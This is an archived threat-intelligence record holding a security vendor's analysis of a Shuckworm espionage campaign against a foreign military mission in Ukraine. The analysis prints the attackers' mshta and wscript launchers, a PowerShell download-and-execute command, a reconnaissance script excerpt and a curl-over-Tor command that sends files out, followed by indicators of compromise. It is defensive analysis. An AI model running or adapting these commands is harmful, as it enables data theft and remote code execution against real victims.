{ "id": "2b540133-7097-49c5-a0cc-0da4540d21df", "created_at": "2026-04-06T00:17:45.922111Z", "updated_at": "2026-04-10T03:37:04.344649Z", "deleted_at": null, "sha1_hash": "197ba2d6753fe6ffefa2196f365fe0127a25a020", "title": "Shuckworm Targets Foreign Military Mission Based in Ukraine", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 104864, "plain_text": "Shuckworm Targets Foreign Military Mission Based in Ukraine\r\nBy About the Author\r\nArchived: 2026-04-05 14:24:28 UTC\r\nShuckworm’s relentless focus on Ukraine has continued into 2025, with the group targeting the military mission of a\r\nWestern country based in the Eastern European nation.\r\nThis first activity in this campaign occurred in February 2025, and it continued into March. The initial infection vector used\r\nby the attackers appears to have been an infected removable drive.\r\nIn this campaign, the attackers appear to be using an updated version of their GammaSteel tool. GammaSteel is an\r\ninfostealer that exfiltrates data from victim networks. The attackers are seen using various methods for data exfiltration,\r\nincluding using the write.as web service for possible exfiltration. They are also seen using cURL alongside Tor as a backup\r\nmethod of data exfiltration. cURL is an open-source command-line tool that can be used to transfer data to and from a server\r\nand is frequently leveraged by malicious actors.\r\nThis campaign also seems to demonstrate a move by Shuckworm from using a lot of VBS scripts to using more PowerShell-based tools, particularly later in its attack chain. It is likely leveraging PowerShell for obfuscation and also because it allows\r\nit to store scripts in the registry. GammaSteel was deployed following a complex, multi-staged attack chain, with frequent\r\nuse of obfuscation. The process was most likely designed to minimize the risk of detection. \r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked espionage group that has almost exclusively focused its\r\noperations on government, law enforcement, and defense organizations in Ukraine since it first appeared in 2013. It is\r\nbelieved that Shuckworm operates on behalf of the Russian Federal Security Service (FSB).\r\nActivity Timeline\r\nThe initial infection in this campaign appeared to occur on February 26 with the creation of a Windows Registry value under\r\nthe UserAssist key that indicates the infection may have started from an external drive and an LNK file named D:\\files.lnk. \r\nThe UserAssist registry key stores the applications, files, links, and other objects accessed by the user through Windows\r\nExplorer stored in a ROT13 format.\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\\Count\\Q:\\svyrf.yax\r\nAfter that event, explorer.exe launched a mshta.exe process executing the following command:\r\n\"C:\\Windows\\System32\\mshta.exe\" javascript:eval('w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"explorer\r\nfiles\");w.run(\"wscript.exe //e:vbScript \\~.drv\");window.close()')\r\nThen, the following commands were executed:\r\n\"C:\\Windows\\System32\\wscript.exe\" //e:vbScript ~.drv\r\n\"C:\\Windows\\System32\\wscript.exe\" \"\"C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms\"\"\r\n//e:vbscript //b /numerousIOC\r\n\"C:\\Windows\\System32\\wscript.exe\" \"\"C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms\"\"\r\n//e:vbscript //b /numerousIOC\r\n\"C:\\Windows\\SysWOW64\\mshta.exe\" \"C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\keepoAI.hta\"\r\nThe ~.drv file is highly obfuscated, but it seems to be used to create two files and execute them:\r\nC:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms\r\nc:\\users\\public\\ntuser.dat.tmcontainer00000000000000000002.regtrans-ms\r\nThe first file (NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms) is used to contact the command and\r\ncontrol (C\u0026C) server and stay in constant contact with it. First, it searches for a ping record with a WMI query:\r\n  \"Select * From Win32_PingStatus where Address = 'mil.gov.ua'\" to the address \"mil.gov.ua\",\r\nIf there is no ping record or the ping is not successful, it will finish execution.\r\nIt then checks if the C\u0026C server address is stored in the value:\r\nHKEY_CURRENT_USER\\\\Console\\\\WindowsUpdates\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 1 of 6\n\nIf not, it will run different methods to obtain the final C\u0026C server address.\r\nThe script leverages different legitimate services to try to resolve the C\u0026C server, including:\r\nhxxps://teletype[.]in/[Value_read_from_WindowsDetect_key]\r\nhxxps://telegra[.]ph/Mark-01-20-5\r\nhxxps://t[.]me/s/futar23\r\n[2_digit_number]sleep.crudoes[.]ru\r\nhxxps://check-host[.]net/ip-info?host=[2_digit_number]position.crudoes.ru\r\nposition.crudoes[.]ru\r\nIn this instance, the attackers were able to obtain a C\u0026C server address and contact it:\r\n107.189.19.218\r\nFrom hxxps://telegra[.]ph/Mark-01-20-5 we also found the following C\u0026C server:\r\nhxxps://des-cinema-democrat-san.trycloudflare[.]com/server\r\nThe C\u0026C server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by\r\nRecorded Future where the group leveraged Cloudflare tunnels for their C\u0026C infrastructure.\r\nFrom t[.]me/futar123 we also found the C\u0026C 107.189.19[.]137 from recovered text:\r\n==107@189@19@137==\r\nThe second file mentioned previously (NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms) appears to be\r\ndesigned to modify the following registry keys to not show hidden and system files:\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden\r\nHKU\\[REDACTED]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt\r\nIt then starts to infect any removable drives and network drives by creating shortcut files (.lnk) for every folder to execute\r\nthe first malicious mshta.exe command (wscript.exe //e:vbScript ~.drv) and hide the folder.\r\nWe found an array of possible file names in Ukrainian, but it is unknown from the script what these files may do.\r\nOriginal:\r\n(\"План проведення\", \"Спецповідомлення\", \"лиcт дo\", \"СПЕЦПЕРЕВІРКА\", \"Рапорт поранення\", \"вiдряджeння\",\r\n\"БОЙОВЕ РОЗПОРЯДЖЕННЯ ППО\", \"Рішення командира на оборону\", \"Зобовязання\", \"бойовий розрахунок\",\r\n\"Супровід ГУР\", \"Інформація щодо загиблих\", \"БМП\", \"продовження контракту\", \"Довідка про зустріч з джерелом\")\r\nTranslated:\r\n(\"Conduct plan\", \"Special message\", \"letter to\", \"SPECIAL INSPECTION\", \"Wound report\", \"deployment\", \"AIR\r\nDEFENSE COMBAT ORDER\", \"Commander's decision on defense\", \"Obligation\", \"Combat calculation\", \"GUR support\",\r\n\"Information on the dead\", \"BMP\", \"contract extension\", \"Reference about meeting with the source\")\r\nOn March 1, an array of activity occurred on the targeted network.\r\nOn one machine, the malicious VBscript—C:\\Users\\Public\\NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms—is executed via WScript.exe. It then reaches out to the following C\u0026C URL:\r\nhxxp://172.104.187.254/mood/1/3/2025/confer[.]html?=[REMOVED]\r\nThe malicious script also exfiltrates some data from the infected machine, such as the username, hostname, and the disk\r\nserial number via the User-Agent HTTP request header:\r\nIServerXMLHTTPRequest2.setRequestHeader(\"user-agent\", \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36\r\n([USERNAME]::[HOSTNAME]_[DISK_SERIAL_NUMBER]::/.nJudged/.TML,\");\r\nIt then saves the valid C\u0026C server address under the registry value: \r\n\"HKEY_CURRENT_USER\\Console\\WindowsUpdates\":\r\nIWshShell3.RegWrite(\"HKEY_CURRENT_USER\\Console\\WindowsUpdates\",\r\n\"http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]\", \"REG_SZ\");\r\nThe code received from the server is Base64 encoded and obfuscated and it launches the following PowerShell command:\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 2 of 6\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" sleep\r\n15;$url='http://64.23.190.235/getinfo.php';$discord = (New-Object system.Net.WebClient).downloadString($url);\r\n$discord | iex\r\nThe C\u0026C server also downloads an obfuscated new version of the same script but this time with hardcoded C\u0026C addresses:\r\nhxxps://surfing-programmer-morris-mortality.trycloudflare[.]com\r\nhxxps://areas-apps-civic-loving.trycloudflare[.]com\r\nhxxps://nav-ni-furnished-handy.trycloudflare[.]com\r\nThis new malicious VBScript file is stored in the following path: \r\nc:\\users\\[REDACTED]\\ntuser.dat.ini\r\nAfter a connection to the new C\u0026C server (hxxps://nav-ni-furnished-handy.trycloudflare[.]com), two new PowerShell\r\nscripts are received. \r\nThe first script appears to be a reconnaissance tool, which is used to create a screenshot of the machine, run a systeminfo\r\ncommand, get the name of the security software running on the machine, get the available space from all disks, get the\r\nVolumeSerialNumber, the directory tree of the Desktop folder, a list of files in the Desktop folder, and a list of the running\r\nprocesses. It then sends all the collected information to the C\u0026C server hxxp://64.23.190[.]235/getinfo[.]php.\r\nThe following is an excerpt of the PowerShell script:\r\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.Windows.Forms\")\r\n$ScreenBounds = [System.Windows.Forms.SystemInformation]::PrimaryMonitorSize;\r\n$arw = \"Wi\",\"dt\",\"h\";\r\n$arh = \"H\",\"ei\",\"g\",\"ht\";\r\n$wi = $arw -join \"\"\r\n$he = $arh -join \"\" ;\r\n$w = $ScreenBounds.\"$wi\" + 1 - 1;\r\n$h = $ScreenBounds.\"$he\" + 1 - 1;\r\n$Image = New-Object System.Drawing.Bitmap($w , $h);\r\n$CopyScreen = [System.Drawing.Graphics]::FromImage($Image);\r\n$process = $(ps | foreach-Object{$a = $_.ProcessName; $a+\"`n\"} );\r\n$Point = New-Object System.Drawing.Point(1, 1);\r\n$ip =\"64.23.190.235\";\r\n$nk = \"com\";\r\n$op = \"o.p\";\r\n$nf = \"nf\";\r\n$nk = $nk + \"putern\" + \"ame\";\r\n$comp = (Get-Item -Path env:\\$nk).Value;\r\n$dasda =\"Vo\"\r\n$dasda = $dasda +\"lume\"\r\n$dasda =$dasda +\"Seria\"\r\n$dasda =$dasda +\"lNum\"\r\n$dasda =$dasda +\"ber\"\r\n$Path = \"$env:appdata\\\";\r\n$name = $path + \"$(get-date -f yyyy.MM.dd_h\\h_m\\m)\"+\".jpg\";\r\nif(![System.IO.Directory]::Exists($Path)){ New-Item -ItemType Directory $Path }\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 3 of 6\n\n$Point = [Drawing.Point]::Empty\r\n$NameValueCollection = New-Object System.Collections.Specialized.NameValueCollection;\r\n$httptext =\"http://\";\r\n$infotext = \"/i\"+$nf+ $op;\r\nThe second PowerShell script received from the C\u0026C server stores the payload obfuscated and split by functions in different\r\nvalues in the registry.\r\nSet-ItemProperty -Path 'HKCU:\\Software' -Name 'LGJuKKhrjgwffjmc1jzSkzT' -Value\r\n'DQAKACAAIAAgACAAdAByAHkAewB7AA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQA\r\nSet-ItemProperty -Path 'HKCU:\\Software' -Name 'wOVzQC0zskdwz2xbraoXftD' -Value\r\n'DQAKACAAIAAgACAAdAByAHkAewB7AA0ACgAJAAkAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0A\r\nThe following is an example of one of the PowerShell functions stored in the registry:\r\n     try{\r\n $jfecWp1fljll0j004nzEODg = \"www.phlovel.ru\";\r\n $odPSSiffq0huyxichtGXAWo =\r\n[System.Net.Dns]::gethostentry($jfecWp1fljll0j004nzEODg).addresslist[0];\r\n $YywyAi53bcklkjtplAEvUrl = $odPSSiffq0huyxichtGXAWo.tostring();\r\n return $YywyAi53bcklkjtplAEvUrl;\r\n }\r\n catch{\r\n return \"\";\r\n }\r\nThis stage appears to be the attackers’ final payload—a PowerShell version of Shuckworm’s known GammaSteel tool.\r\nThis tool enumerates all the files in the following folders:\r\nDesktop\r\nDocuments\r\nDownloads\r\nIt exfiltrates files that match a hardcoded extension list:\r\n\"*.doc\", \"*.docx\", \"*.xls\", \"*.xlsx\", \"*.ppt\", \"*.pptx\", \"*.vsd\", \"*.vsdx\", \"*.rtf\", \"*.odt\", \"*.txt\", \"*.pdf\"\r\nIt ignores folders that contain the following strings:\r\n\"prog\", \"windows\", \"appdata\", \"local\", \"roaming\", \"software\", \"public\", \"all users\"\r\nIt uses certutil.exe to get the MD5 of the exfiltrated file and possibly store it as a file, which is something previous versions\r\nof the GammaSteel malware also did.\r\n\"C:\\Windows\\system32\\certutil.exe\" -hashfile \"[REDACTED].txt\" MD5\r\nThis version of GammaSteel tries to exfiltrate the files via a PowerShell web request, but if it fails, as a fallback method, it\r\nuses cURL with a Tor network proxy to obfuscate the origin IP:\r\n\"C:\\Windows\\system32\\curl.exe\" -x socks5://127.0.0.1:9050 -v -k -F o2PVasTpH2AxGgiYBSjb=[REDACTED] -F\r\nAWpCbqMhrFvHx4QJkAXlj=@[REDACTED].pdf https://85.92.111.12\r\nThe first post parameter contains some information regarding the machine, like the hostname, the drive serial number, and\r\nthe path of the exfiltrated file:\r\njhEOKsGyR07pNfM::1000::PAikOnBfhsr::[REDACTED].pdf::Bqf4wlnsrc::22.02.2025\r\n14:18:24::mU0p1uNxlLvd::508383::GHCcfPBq1NwgZ::boML6spmjPF::Ti5vCm4hcu::[REDACTED]**2863E630::S3apqcC4J20QH\r\nIt also contained some incomplete code that seems to leverage the web service write.as to possibly exfiltrate some\r\ninformation from the computer:\r\n$REGWeqlhlmtvuskihNeRgib = \"https://write.as/api/posts\";\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 4 of 6\n\n$XUqKFBjm5dwgqh5aljmHuTC = '{{\"body\": \"This is a post.\", \"title\": \"My First Post\"}}';\r\n$aFKGHf31o2g4jrm00nkAQdv = @{{\"Content-Type\" = \"application/json\"}};\r\n$KMTPQV1jeau2lslqmzcNPyG = Invoke-WebRequest -Uri $REGWeqlhlmtvuskihNeRgib -Method \"POST\" -Body\r\n$XUqKFBjm5dwgqh5aljmHuTC -Headers $aFKGHf31o2g4jrm00nkAQdv;\r\nTo obtain persistence, the malware registers itself in the Run registry key:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[USERNAME]\r\nConclusion\r\nThis attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other\r\nRussian actors, though it compensates for this with its relentless focus on targets in Ukraine. While the group does not\r\nappear to have access to the same skill set as some other Russian groups, Shuckworm does now appear to be trying to\r\ncompensate for this by continually making minor modifications to the code it uses, adding obfuscation, and leveraging\r\nlegitimate web services, all to try lower the risk of detection.  \r\nThis campaign also demonstrates that the group remains laser-focused on targeting entities within Ukraine for espionage\r\npurposes.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\n714aeb3d778bbd03d0c9eaa827ae8c91199ef07d916405b7f4acd470f9a2a437\r\n90ec1f4dd69c84c3eb0b2cada4a31168de278eff9b21cb20551ec39d5bcb9da2\r\nLucystew[.]ru\r\nposition.crudoes[.]ru\r\nwww.phlovel[.]ru\r\nareas-apps-civic-loving.trycloudflare[.]com\r\ndes-cinema-democrat-san.trycloudflare[.]com\r\ndistributors-marble-saddam-much.trycloudflare[.]com\r\nnav-ni-furnished-handy.trycloudflare[.]com\r\nsurfing-programmer-morris-mortality.trycloudflare[.]com\r\naffects-periodic-explorer-broadband.trycloudflare[.]com\r\nabraham-lc-happened-ericsson.trycloudflare[.]com\r\nargentina-references-rapid-selecting.trycloudflare[.]com\r\nbeverly-cups-soft-concentrate.trycloudflare[.]com\r\nboxes-harvest-cameroon-uniform.trycloudflare[.]com\r\ncables-tension-bronze-hans.trycloudflare[.]com\r\nconvergence-suffering-reel-ingredients.trycloudflare[.]com\r\ndetector-excluded-knowledgestorm-two.trycloudflare[.]com\r\nfee-ss-launch-remedies.trycloudflare[.]com\r\nff-susan-config-mod.trycloudflare[.]com\r\nnail-employed-icon-pre.trycloudflare[.]com\r\npdt-throwing-pod-places.trycloudflare[.]com\r\npresents-turner-cir-hollow.trycloudflare[.]com\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 5 of 6\n\npromptly-allows-pendant-close.trycloudflare[.]com\r\nreflection-tomorrow-brook-dakota.trycloudflare[.]com\r\nrepresentatives-liable-sight-tigers.trycloudflare[.]com\r\nsick-netherlands-alumni-electric.trycloudflare[.]com\r\nterry-training-springer-engagement.trycloudflare[.]com\r\nfarming-alternatively-velvet-warming.trycloudflare[.]com\r\npays-habitat-florists-virtually.trycloudflare[.]com\r\njet-therapy-cape-correctly.trycloudflare[.]com\r\nder-grande-transmitted-benchmark.trycloudflare[.]com\r\neddie-lewis-exercises-conventions.trycloudflare[.]com\r\njon-shopzilla-canada-analytical.trycloudflare[.]com\r\nhints-heated-terrain-poem.trycloudflare[.]com\r\nbelongs-tells-sum-harvest.trycloudflare[.]com\r\nobj-sudan-quote-aw.trycloudflare[.]com\r\nacquisition-gray-advertisements-trained.trycloudflare[.]com\r\nmissouri-itunes-recognize-adds.trycloudflare[.]com\r\nover-function-foo-school.trycloudflare[.]com\r\ncriterion-receipt-proceeds-fate.trycloudflare[.]com\r\nphpbb-zealand-hop-magnetic.trycloudflare[.]com\r\nscore-adams-coastal-moreover.trycloudflare[.]com\r\n107.189.19[.]137\r\n107.189.19[.]218\r\n165.232.153[.]27\r\n172.104.187[.]254\r\n64.23.190[.]235\r\n85.92.111[.]12\r\n45.61.166[.]43\r\n159.223.50[.]199\r\n139.59.136[.]192\r\n104.16.230[.]132\r\n104.16.231[.]132\r\nntuser.dat.tmcontainer00000000000000000001.regtrans-ms\r\nntuser.dat.tmcontainer00000000000000000002.regtrans-ms\r\n~.drv\r\nntuser.dat.ini\r\ndesperately.tmp\r\nSource: https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nhttps://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://www.security.com/threat-intelligence/shuckworm-ukraine-gammasteel" ], "report_names": [ "shuckworm-ukraine-gammasteel" ], "threat_actors": [ { "id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308", "created_at": "2022-10-25T15:50:23.320841Z", "updated_at": "2026-04-10T02:00:05.356444Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Gamaredon Group", "IRON TILDEN", "Primitive Bear", "ACTINIUM", "Armageddon", "Shuckworm", "DEV-0157", "Aqua Blizzard" ], "source_name": "MITRE:Gamaredon Group", "tools": [ "QuietSieve", "Pteranodon", "Remcos", "PowerPunch" ], "source_id": "MITRE", "reports": null }, { "id": "d5156b55-5d7d-4fb2-836f-861d2e868147", "created_at": "2023-01-06T13:46:38.557326Z", "updated_at": "2026-04-10T02:00:03.023048Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "ACTINIUM", "DEV-0157", "Blue Otso", "G0047", "IRON TILDEN", "PRIMITIVE BEAR", "Shuckworm", "UAC-0010", "BlueAlpha", "Trident Ursa", "Winterflounder", "Aqua Blizzard", "Actinium" ], "source_name": "MISPGALAXY:Gamaredon Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "61940e18-8f90-4ecc-bc06-416c54bc60f9", "created_at": "2022-10-25T16:07:23.659529Z", "updated_at": "2026-04-10T02:00:04.703976Z", "deleted_at": null, "main_name": "Gamaredon Group", "aliases": [ "Actinium", "Aqua Blizzard", "Armageddon", "Blue Otso", "BlueAlpha", "Callisto", "DEV-0157", "G0047", "Iron Tilden", "Operation STEADY#URSA", "Primitive Bear", "SectorC08", "Shuckworm", "Trident Ursa", "UAC-0010", "UNC530", "Winterflounder" ], "source_name": "ETDA:Gamaredon Group", "tools": [ "Aversome infector", "BoneSpy", "DessertDown", "DilongTrash", "DinoTrain", "EvilGnome", "FRAUDROP", "Gamaredon", "GammaDrop", "GammaLoad", "GammaSteel", "Gussdoor", "ObfuBerry", "ObfuMerry", "PlainGnome", "PowerPunch", "Pteranodon", "Pterodo", "QuietSieve", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "Resetter", "RuRAT", "SUBTLE-PAWS", "Socmer", "UltraVNC" ], "source_id": "ETDA", "reports": null }, { "id": "236a8303-bf12-4787-b6d0-549b44271a19", "created_at": "2024-06-04T02:03:07.966137Z", "updated_at": "2026-04-10T02:00:03.706923Z", "deleted_at": null, "main_name": "IRON TILDEN", "aliases": [ "ACTINIUM ", "Aqua Blizzard ", "Armageddon", "Blue Otso ", "BlueAlpha ", "Dancing Salome ", "Gamaredon", "Gamaredon Group", "Hive0051 ", "Primitive Bear ", "Shuckworm ", "Trident Ursa ", "UAC-0010 ", "UNC530 ", "WinterFlounder " ], "source_name": "Secureworks:IRON TILDEN", "tools": [ "Pterodo" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434665, "ts_updated_at": 1775792224, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.pdf", "text": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.txt", "img": "https://archive.orkl.eu/197ba2d6753fe6ffefa2196f365fe0127a25a020.jpg" } }